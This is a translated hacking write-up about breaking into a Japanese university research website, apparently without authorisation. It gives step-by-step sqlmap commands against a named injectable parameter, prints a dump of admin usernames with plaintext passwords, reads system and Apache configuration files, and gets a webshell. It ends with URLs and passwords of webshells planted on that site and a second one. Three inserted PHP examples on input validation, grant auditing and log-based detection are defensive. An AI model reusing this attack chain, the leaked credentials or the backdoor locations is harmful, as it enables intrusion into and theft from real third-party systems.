Penetration into Japanese Kanagawa University site

Source: Internet
Author: User

Information gathering:

Target Site: http://icfcs.xxxxx.jp
Server IP: 210.166.xxx.76 (Japan)
Environment platform: PHP/5.1.6
Server System: Apache/2.2.3 (Red Hat)
Open the site's home page, pick any link, and test manually for an injection vulnerability. Appending ' returns an error. Running sqlmap against the same parameter confirms that it is injectable (manual injection did not work for me; I wonder whether that is my own technical shortcoming). The boolean tests 1=1 and 1=2 both returned a normal page, and later tests gave the same two normal results; the exact cause was not clear, and I did not dig into the code, so I could not work it out. 0_0!
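The injection lives in the news_id parameter of detail.php. The site's own source is not shown on this page, so the following is an added illustration rather than its code: the classic concatenation pattern that produces exactly the symptoms above (an error on a stray quote, and boolean tests that ask the database yes/no questions), beside a hardened version that validates news_id as an integer and binds it through a PDO prepared statement. Table and column names (news, title, body) are assumed; the example uses PHP 7.1+ syntax and an in-memory SQLite database so that it runs offline, whereas the target runs PHP 5.1.6 with MySQL.

```php
<?php
// Added example, not the target site's code. Table and column names (news, news_id,
// title, body) are assumed; the page only shows that a `news` table exists and that
// news_id is the injectable parameter.

// --- Vulnerable pattern: what an injectable detail.php typically looks like ---
function buildVulnerableQuery(string $newsId): string
{
    // The parameter is concatenated straight into the SQL text. A stray quote
    // (news_id=66') breaks the syntax and triggers the error seen in the write-up,
    // and "66 AND 1=1" / "66 AND 1=2" let the caller steer the WHERE clause.
    return "SELECT title, body FROM news WHERE news_id = " . $newsId;
}

// --- Hardened version ---
function validateNewsId($raw): int
{
    // Accept only a positive integer; anything else is rejected before the DB is touched.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('news_id must be a positive integer');
    }
    return $id;
}

function fetchNews(PDO $db, $rawNewsId): ?array
{
    $id = validateNewsId($rawNewsId);
    // Prepared statement: the value travels separately from the SQL text, so it can
    // never change the statement's structure, whatever magic_quotes_gpc is set to.
    $stmt = $db->prepare('SELECT title, body FROM news WHERE news_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration with an in-memory SQLite database (assumption: the real site uses
// MySQL, but the PDO calls are identical apart from the DSN).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (news_id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO news VALUES (66, 'Hello', 'Sample body')");

echo buildVulnerableQuery('66 AND 1=2'), PHP_EOL;   // the caller now owns the WHERE clause

var_dump(fetchNews($db, '66'));                      // the row for news_id 66
foreach (["66'", '66 AND 1=2', '-1'] as $bad) {
    try {
        fetchNews($db, $bad);
    } catch (InvalidArgumentException $e) {
        echo "rejected: $bad -> {$e->getMessage()}", PHP_EOL;
    }
}
```

The hardened version holds regardless of magic_quotes_gpc: escaping quotes never protected a numeric context (66 AND 1=2 contains no quote at all), while a bound integer parameter cannot alter the statement.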

Next, sqlmap is used to dump the administrator account and password:

1. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --dbms "mysql" --dbs // list all database names
2. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --dbms "mysql" --current-db // list the current database name
3. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --dbms "mysql" --current-user // list the current database user
4. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --dbms "mysql" -D "icfcs" --tables // list the tables in the icfcs database
5. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --dbms "mysql" -D "icfcs" -T "admin" --columns // list the columns of the admin table in the icfcs database
6. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --dbms "mysql" -D "icfcs" -T "admin" -C "admin_id,admin_pw" --dump // dump the admin_id and admin_pw columns of the admin table in the icfcs database

Output:

available databases:
[*] colonnade
[*] eccube
[*] icfcs
[*] information_schema
[*] mysql
[*] namiki-s
[*] test

current database: icfcs
current user: admin-icfcs@localhost

Database: icfcs
[tables]
+----------+
| admin    |
| download |
| news     |
| research |
| science  |
+----------+

Database: icfcs
Table: admin
[columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| admin_id | varchar(255) |
| admin_pw | varchar(255) |
| group_id | varchar(255) |
+----------+--------------+

Database: icfcs
Table: admin
[entries]
+----------+---------------+
| admin_id | admin_pw      |
+----------+---------------+
| admin    | administrator |
| group1   | group1        |
| group2   | 9ffvPHh1      |
| group3   | Ip84lIxd      |
| group4   | e19EkjJb      |
| group5   | rOSuvx97      |
| group6   | mutPC84l      |
| group7   | nAN8yv3a      |
| group8   | kCUeq61u      |
+----------+---------------+
Admin backend: http://icfcs.xxxxx.jp/admin/. The injection above yielded the administrator account and password, but the backend turned out to have only three menu sections, an upload function and an FCKeditor editor, all of them restricted. I tried every approach I know and could not get a webshell through the backend. @_@

After a cigarette break and some further testing, I found that the admin-icfcs@localhost database user has root privileges. The test method is as follows:

1. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 -D "eccube" --tables // cross-database query
2. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --file-read "/etc/passwd" // read a system file

Either of the two tests above shows that the admin-icfcs@localhost database user has root privileges. Knowing that, there is a new approach: use admin-icfcs@localhost to write the webshell directly.

Prerequisites for writing a webshell from MySQL root:
1. Injection point: http://icfcs.xxxxx.jp/news/detail.php?news_id=66
2. Root database user: admin-icfcs@localhost (root privileges)
3. magic_quotes_gpc disabled: Off
Reference: http://baike.baidu.com/view/5234458.htm
4. Absolute website path:/home/icfcs.kanxxxxx.ac.jp/public_html/
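Every item in this prerequisite list except the injection point itself is a database-side misconfiguration: the web application's MySQL account holds root, so cross-database reads, --file-read (LOAD_FILE) and --os-shell (writing a file into the web root) all succeed, and nothing confines where mysqld may read or write. The following added PHP script, which is not part of the write-up, parses SHOW GRANTS rows and flags the privileges that enable those steps, together with the secure_file_priv setting. The grant strings and the 'webapp' account are constructed; it requires PHP 7.1+.

```php
<?php
// Added example: audit MySQL grants for the privileges that make --file-read and
// --os-shell possible. Not from the original write-up; the grant strings are constructed.

const DANGEROUS_PRIVILEGES = ['ALL PRIVILEGES', 'FILE', 'SUPER', 'GRANT OPTION'];

/**
 * Parse one "GRANT ... ON ... TO ..." row from SHOW GRANTS into its privilege list,
 * scope and grantee. WITH GRANT OPTION is recorded as a privilege of its own.
 */
function parseGrant(string $grant): ?array
{
    $re = '/^GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s+(.+?)(\s+WITH\s+GRANT\s+OPTION)?$/i';
    if (!preg_match($re, $grant, $m)) {
        return null;
    }
    $privs = array_map('trim', explode(',', strtoupper($m[1])));
    if (!empty($m[4])) {
        $privs[] = 'GRANT OPTION';
    }
    return ['privileges' => $privs, 'scope' => $m[2], 'user' => $m[3]];
}

/** Return the findings a reviewer should act on for a set of SHOW GRANTS rows. */
function auditGrants(array $grantRows, ?string $secureFilePriv): array
{
    $findings = [];
    foreach ($grantRows as $row) {
        $g = parseGrant($row);
        if ($g === null) {
            $findings[] = "unparsed grant: $row";
            continue;
        }
        foreach (array_intersect($g['privileges'], DANGEROUS_PRIVILEGES) as $p) {
            $findings[] = "{$g['user']} has $p on {$g['scope']}";
        }
        // USAGE alone is MySQL's "no privileges" marker and is harmless at global scope;
        // any real privilege on *.* reaches every other database (the cross-database query).
        if ($g['scope'] === '*.*' && $g['privileges'] !== ['USAGE']) {
            $findings[] = "{$g['user']} has global scope (*.*): other databases are readable";
        }
    }
    // secure_file_priv = '' lets LOAD_FILE / INTO OUTFILE touch any path the mysqld user
    // can reach, including the web root; NULL disables file operations entirely, and a
    // directory confines them to that directory.
    if ($secureFilePriv === '') {
        $findings[] = 'secure_file_priv is empty: file read/write is unrestricted';
    }
    return $findings;
}

// Constructed sample: an over-privileged web account, as in the write-up, and a
// least-privilege replacement confined to the application's own database.
$overPrivileged = ["GRANT ALL PRIVILEGES ON *.* TO 'admin-icfcs'@'localhost' WITH GRANT OPTION"];
$leastPrivilege = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE ON `icfcs`.* TO 'webapp'@'localhost'",
];

print_r(auditGrants($overPrivileged, ''));     // four findings
print_r(auditGrants($leastPrivilege, null));   // no findings
```

The audit is deliberately narrow: FILE is the single privilege behind both the httpd.conf read and the webshell write, so an account that lacks it (and has no global scope) removes every step after the injection itself, even while the injection remains unfixed.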

Obtaining the website's absolute path with sqlmap's --file-read parameter:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --file-read "/etc/httpd/conf/httpd.conf"

The Apache configuration file /etc/httpd/conf/httpd.conf read with sqlmap's --file-read parameter is stored locally at:

/pentest/database/sqlmap/output/icfcs.kanxxxx-u.ac.jp/files/etc/httpd/conf/httpd.conf


Obtaining webshell access to the website with sqlmap's --os-shell parameter:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://icfcs.xxxxx.jp/news/detail.php?news_id=66 --os-shell


At this point the site is effectively taken. Let's look at the temporary upload file generated by sqlmap's --os-shell parameter (the file name is randomly generated):
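From the defender's side, the whole sequence above (the quote probe, the 1=1/1=2 tests, --dbs and --dump, --file-read, --os-shell) leaves a distinctive trail in the Apache access log: one parameter hit over and over with SQL fragments and, unless the operator changes it, a User-Agent that names the tool. The following added PHP example, not from the page, runs simple indicator matching over constructed combined-format log lines; the IP addresses and requests are made up to resemble the activity described.

```php
<?php
// Added example (not from the write-up): flag SQL-injection probing in Apache
// combined-format access logs. The log lines at the bottom are constructed.

const SQLI_PATTERNS = [
    '/\'/'                           => 'quote probe',
    '/\b(AND|OR)\s+\d+\s*=\s*\d+/i'  => 'boolean test (1=1 / 1=2)',
    '/\bUNION\b.*\bSELECT\b/i'       => 'UNION SELECT',
    '/LOAD_FILE\s*\(/i'              => 'LOAD_FILE (file read)',
    '/INTO\s+(OUT|DUMP)FILE/i'       => 'INTO OUTFILE (file write)',
    '/information_schema/i'          => 'schema enumeration',
];

/** Split one combined-log line into client IP, decoded request target and User-Agent. */
function parseLogLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    // Decode once so %27 and %20 are matched as the characters the database sees.
    return ['ip' => $m[1], 'request' => urldecode($m[2]), 'ua' => $m[3]];
}

/** Return [ip => [reason, ...]] for every client that shows injection indicators. */
function detectInjection(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $e = parseLogLine($line);
        if ($e === null) {
            continue;
        }
        $reasons = [];
        if (stripos($e['ua'], 'sqlmap') !== false) {
            $reasons[] = 'sqlmap user-agent';   // sqlmap's default UA unless overridden
        }
        foreach (SQLI_PATTERNS as $pattern => $label) {
            if (preg_match($pattern, $e['request'])) {
                $reasons[] = $label;
            }
        }
        if ($reasons) {
            $merged = array_merge($hits[$e['ip']] ?? [], $reasons);
            $hits[$e['ip']] = array_values(array_unique($merged));
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic): one normal visitor, then a client
// probing news_id with a quote, a boolean test and a file read.
$sample = [
    '203.0.113.5 - - [10/Mar/2012:13:55:36 +0900] "GET /news/detail.php?news_id=66 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2012:13:56:01 +0900] "GET /news/detail.php?news_id=66%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2012:13:56:09 +0900] "GET /news/detail.php?news_id=66%20AND%201=2 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '198.51.100.7 - - [10/Mar/2012:13:57:44 +0900] "GET /news/detail.php?news_id=66%20UNION%20SELECT%20LOAD_FILE(%27/etc/passwd%27),2 HTTP/1.1" 200 7000 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
];

print_r(detectInjection($sample));   // only 198.51.100.7 is reported, with its reasons
```

Pattern matching on the request is a starting point, not a complete detector: a single quote appears in legitimate input too, so in practice the per-client reason count and the burst of requests against one parameter carry more weight than any one match, and a 500 response on a quote probe (the second sample line) is the server-side counterpart of the error the write-up observed.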


My friend said that he had obtained what he needed, so I did not go on to privilege escalation.

Information summary:

/home/chemixxxba.com/public_html/files/
/home/chemixxxba.com/public_html/upload/
/home/chemixxxba.com/public_html/guanli2010/
/home/chemixxxba.com/public_html/phpinfo.php
http://www.chemixxxba.com/files/EXCEL/index.php    ice
/home/icfcs.kanxxxx-u.ac.jp/public_html/upload/
http://icfcs.xxxxx.jp/upload/aa.php    admin!@#123ASD
http://icfcs.xxxxx.jp/upload/gb2312.php    gh0st
http://icfcs.xxxxx.jp/upload/0316Programs(1).php    admin!@#123ASD
